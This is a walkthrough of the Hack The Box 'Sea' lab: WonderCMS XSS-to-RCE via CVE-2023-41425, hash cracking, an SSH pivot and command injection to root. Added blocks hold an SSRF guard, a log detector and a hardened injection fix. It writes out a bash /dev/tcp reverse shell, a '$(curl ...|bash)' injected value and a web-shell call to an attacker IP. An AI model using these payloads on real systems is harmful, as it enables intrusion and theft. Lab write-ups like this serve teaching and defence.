> m4rt@CTF_ARCHIVE:~$

Hack The Box / LINUX / 2026-03-27

Hack The Box — Sea (Linux)

Contact form browser callback abuse, WonderCMS XSS-to-RCE, credential recovery from config hash, SSH pivot, and command injection in an internal analysis feature to read root flag.

Target

  • IP: 10.129.62.220

Recon

sudo nmap -sC -sV 10.129.62.220 -p- -v -T5
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e3:54:e0:72:20:3c:01:42:93:d1:66:9d:90:0c:ab:e8 (RSA)
|   256 f3:24:4b:08:aa:51:9d:56:15:3d:67:56:74:7c:20:38 (ECDSA)
|_  256 30:b1:05:c6:41:50:ff:22:a3:7f:41:06:0e:67:fd:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Sea - Home
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add sea.htb to /etc/hosts.

Browser callback from contact form

Start netcat listener:

nc -vlnp 80

Go to http://sea.htb/contact.php. In the form, set the website URL to your attacker host (where the netcat listener above is running). Submit the form, intercept the request with Burp and forward it to Repeater.

On netcat we get:

GET / HTTP/1.1
Host: 10.10.14.49
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.5938.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate

So a headless Chrome browser on the server side visits whatever URL we submit (note the HeadlessChrome User-Agent above).

Because that browser runs on the target, JavaScript in a page we host can probe localhost (127.0.0.1) for listening ports and report the results back to us. See attachments:

  • attachments/test.html
  • attachments/test.py

Start web server:

python3 -m http.server 80

Start receiver script:

python3 attachments/test.py

In the contact form, set website to:

http://10.10.14.49/test.html

Send request and wait. Python server output:

10.129.62.220 - - [14/Aug/2024 15:29:45] "POST / HTTP/1.1" 200 -
b'{"port":80,"response":{}}'
10.129.62.220 - - [14/Aug/2024 15:29:45] "POST / HTTP/1.1" 200 -
b'{"port":8080,"response":{}}'
10.129.62.220 - - [14/Aug/2024 15:29:45] "POST / HTTP/1.1" 200 -

Port 8080 answers. Because the probes are sent with mode: 'no-cors', the browser only hands us opaque responses: we learn that something is listening, but we cannot read the response body.
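The root cause of this first step is that the contact form hands an unvalidated, user-supplied URL to a server-side browser. The following guard is an added example of the check such a form should run first; it is not code from the writeup or from WonderCMS, and the names callback_url_is_safe, resolve_all and table_resolver are hypothetical. It rejects loopback, private, link-local and other non-public destinations, checks every resolved address of a hostname rather than the hostname string, and only allows the standard web ports.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Added example (hypothetical names): a pre-flight check for a contact form
# that lets a headless browser visit a user-supplied "website" URL.

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}


def is_forbidden_ip(ip):
    """Addresses a server-side browser must never be pointed at."""
    return (
        ip.is_loopback
        or ip.is_private
        or ip.is_link_local
        or ip.is_multicast
        or ip.is_reserved
        or ip.is_unspecified
    )


def resolve_all(host):
    """Every A/AAAA record for host (assumes DNS is reachable)."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    addrs = set()
    for info in infos:
        # strip a possible IPv6 scope id such as "%eth0"
        addrs.add(ipaddress.ip_address(info[4][0].split("%")[0]))
    return sorted(addrs, key=str)


def table_resolver(table):
    """Offline resolver built from a dict {host: [ip, ...]} (for tests/demos)."""
    return lambda host: [ipaddress.ip_address(a) for a in table.get(host, [])]


def callback_url_is_safe(url, resolver=resolve_all):
    """True only if the URL points at a public host on a standard web port."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False
    if not parts.hostname or parts.username or parts.password:
        return False
    try:
        if parts.port not in ALLOWED_PORTS:
            return False
    except ValueError:  # e.g. "http://host:abc/"
        return False
    try:
        addrs = [ipaddress.ip_address(parts.hostname)]  # literal address
    except ValueError:
        addrs = resolver(parts.hostname)  # hostname: check every record
    if not addrs:
        return False
    return not any(is_forbidden_ip(ip) for ip in addrs)


if __name__ == "__main__":
    for u in ["http://10.10.14.49/test.html", "http://127.0.0.1:8080/",
              "http://[::1]/", "http://169.254.169.254/latest/"]:
        print(u, callback_url_is_safe(u))
```

Checking the resolved addresses rather than the hostname text also catches decimal or octal spellings of an address that the resolver normalises. What this check cannot cover is DNS rebinding between the check and the visit, so the browser that performs the visit should additionally run in an egress-filtered network namespace or container with no route to localhost or the internal network.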

WonderCMS exploit path

gobuster dir -u http://sea.htb/ -w /home/kali/SecLists/Discovery/Web-Content/raft-small-words.txt -t 50 -x php

The scan reveals a themes directory.

gobuster dir -u http://sea.htb/themes -w /home/kali/SecLists/Discovery/Web-Content/raft-small-words.txt -t 50 -x php

Under themes there is a bike directory.

Go to http://sea.htb/themes/bike/README.md:

## How to use
1. Login to your WonderCMS website.
2. Click "Settings" and click "Themes".
3. Find theme in the list and click "install".
4. In the "General" tab, select theme to activate it.

There is a public PoC for CVE-2023-41425, a stored XSS in WonderCMS that the PoC chains into RCE by having the victim browser install a theme containing a web shell:

  • https://github.com/prodigiousMind/CVE-2023-41425

Run PoC:

python3 exploit.py http://sea.htb 10.10.14.49 4444

In the contact form, set website to:

http://10.10.14.49:8000/xss.js

Wait until the server-side browser loads xss.js.

Start listener:

nc -vlnp 4444

Browse to:

http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.49&lport=4444

We get reverse shell.
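From the defender's side, every step of this chain leaves traces in the Apache access log: the directory brute force (a burst of 404s from one client), PHP being served from a theme directory that was never installed, and the web shell being called with lhost/lport parameters. The detector below is an added example, not code from the writeup; it assumes Apache combined log format and that bike is the only legitimately installed theme, and the sample log lines are constructed (the rev.php request mirrors the URL used above).

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Added detection example (not code from the writeup). Assumes Apache
# "combined" access log format and that "bike" is the only installed theme.

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
THEME_RE = re.compile(r"^/themes/(?P<theme>[^/]+)/")
# lhost/lport come from the rev.php URL in the writeup; "cmd" is an added
# generic name commonly used by dropped web shells.
SHELL_PARAMS = {"lhost", "lport", "cmd"}


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it doesn't match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def detect(lines, known_themes=frozenset({"bike"}), scan_threshold=10):
    """Return (severity, ip, reason) tuples for the patterns in the writeup."""
    alerts = []
    not_found = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["status"] == 404:
            not_found[rec["ip"]] += 1
        url = urlsplit(rec["target"])
        tm = THEME_RE.match(url.path)
        if not tm:
            continue
        hit = set(parse_qs(url.query)) & SHELL_PARAMS
        if hit:
            alerts.append(("high", rec["ip"],
                           f"{url.path} called with shell-like params {sorted(hit)}"))
        elif tm.group("theme") not in known_themes and url.path.endswith(".php"):
            alerts.append(("medium", rec["ip"],
                           f"PHP under unexpected theme directory {tm.group('theme')!r}"))
    for ip, n in not_found.items():
        if n >= scan_threshold:
            alerts.append(("low", ip, f"{n} 404 responses, possible directory brute force"))
    return alerts


# Constructed sample log: a gobuster-style 404 burst, a benign theme asset,
# a PHP file under a theme that was never installed, and the rev.php call.
SAMPLE_LOG = [
    '10.10.14.49 - - [14/Aug/2024:15:20:00 +0000] '
    f'"GET /guess{i}.php HTTP/1.1" 404 275 "-" "gobuster/3.6"'
    for i in range(12)
] + [
    '192.0.2.10 - - [14/Aug/2024:15:28:11 +0000] "GET /themes/bike/css/style.css HTTP/1.1" 200 4410 "http://sea.htb/" "Mozilla/5.0"',
    '10.10.14.49 - - [14/Aug/2024:15:30:40 +0000] "GET /themes/revshell-main/theme.php HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
    '10.10.14.49 - - [14/Aug/2024:15:31:02 +0000] "GET /themes/revshell-main/rev.php?lhost=10.10.14.49&lport=4444 HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Run against the sample, this yields one high, one medium and one low alert, all attributed to 10.10.14.49. The medium rule is the most durable of the three: a PHP file appearing under a theme directory that the site owner never installed is a strong signal regardless of which PoC was used to get it there.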

There are users amay and geo.

Credential recovery and SSH

cd /var/www/sea
cat database.js

It contains the admin password hash:

"password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q"

WonderCMS stores the password with PHP password_hash (bcrypt, hence the $2y$ prefix). The \/ sequences are just JSON escaping of /, so remove the backslashes and save the hash to a file.

hashcat -a 0 -m 3200 ./hash ./rockyou.txt
$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q:mychemicalromance
ssh amay@sea.htb

Use the password found above.

ssh amay@sea.htb -NL 5555:localhost:8080

Open http://127.0.0.1:5555. It asks for username/password. Use:

  • username: amay
  • password: mychemicalromance

Root via command injection

Create a file named rev containing:

bash -i >& /dev/tcp/10.10.14.49/4444 0>&1

Start server and listener:

python3 -m http.server 80
nc -vlnp 4444

Click Analyze, intercept the request with Burp and send it to Repeater. Change the log_file parameter to:

$(curl http://10.10.14.49/rev|bash)

We get a reverse shell as root, but it exits quickly. We can still retrieve the root flag by changing log_file to:

$(cp /root/root.txt /tmp; chmod 777 /tmp/root.txt)

Then, in the amay SSH session:

cat /tmp/root.txt
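The root step works because the internal application interpolates the log_file value into a shell command line, where $(...) is expanded by the shell before the intended command runs. The block below is an added example, not the box's internal application: a Python re-creation of that pattern next to a hardened version. The function names, the wc-based "analysis" and the sample log directory are assumptions.

```python
import os
import re
import subprocess
import tempfile

# Added example (hypothetical names): the command-injection pattern behind an
# "analyze this log file" feature, vulnerable and hardened side by side.

SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]*\.log")


def analyze_vulnerable(log_dir, log_file):
    """Interpolates the parameter into a shell command line, so ';', '|',
    backticks and $(...) inside log_file are interpreted by /bin/sh."""
    cmd = f"wc -l {log_dir}/{log_file}"
    done = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return done.stdout


def analyze_hardened(log_dir, log_file):
    """Allow-list the name, pin the resolved path inside log_dir, and pass an
    argv list so the value never reaches a shell."""
    if not SAFE_NAME.fullmatch(log_file):
        raise ValueError(f"rejected log_file: {log_file!r}")
    base = os.path.realpath(log_dir)
    path = os.path.realpath(os.path.join(base, log_file))
    if os.path.dirname(path) != base:
        raise ValueError("log_file escapes the log directory")
    if not os.path.isfile(path):
        raise FileNotFoundError(path)
    done = subprocess.run(["wc", "-l", path], capture_output=True, text=True, check=True)
    return int(done.stdout.split()[0])


def rejected(log_dir, log_file):
    """True if the hardened version refuses log_file with ValueError."""
    try:
        analyze_hardened(log_dir, log_file)
    except ValueError:
        return True
    return False


def make_sample_dir():
    """Constructed fixture: a temp log directory holding one three-line file."""
    d = tempfile.mkdtemp(prefix="logs-")
    with open(os.path.join(d, "access.log"), "w") as fh:
        fh.write("line1\nline2\nline3\n")
    return d


if __name__ == "__main__":
    d = make_sample_dir()
    print("hardened:", analyze_hardened(d, "access.log"))
    print("vulnerable:", analyze_vulnerable(d, "access.log; echo INJECTED"))
    print("hardened rejects injection:", rejected(d, "access.log; echo INJECTED"))
```

Two further points follow from the writeup itself. The shell arrived as root, so the service ran as root; running it as a dedicated low-privilege user would have turned this into a far smaller finding. And when the whole "analysis" is a line count, the best fix is not a safer subprocess call but no subprocess at all: read the file in-process.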